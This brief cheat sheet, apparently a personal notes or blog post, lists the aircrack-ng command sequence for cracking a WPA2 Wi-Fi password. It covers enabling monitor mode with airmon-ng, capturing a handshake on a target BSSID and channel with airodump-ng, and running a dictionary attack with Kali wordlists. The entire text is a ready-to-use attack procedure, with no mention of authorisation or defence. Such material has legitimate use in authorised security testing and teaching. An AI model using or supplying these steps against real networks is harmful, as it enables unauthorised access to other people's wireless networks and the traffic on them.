cracking wpa2 with aircrack-ng

airmon-ng (to list available devices)

airmon-ng start <device name> (to start listening on that device)

airodump-ng <device name> (starts the listening of wireless networks. note: the device name will change when started from example wlan0 to wlan0mon) Note: you will need to kill ALL processes listed as troublesome.

airodump-ng -w <filename> -c <channel> –bssid<bssid of wap>  <device name> (the file name can be random. the -c is the channel of the bssid your trying to crack) This needs to run until a device connects to the Wifi network you are monitoring.

aircrack-ng <filename.cap> -w <your password list> (in kali linux you can go to /usr/share/wordlists for a good wordlists)
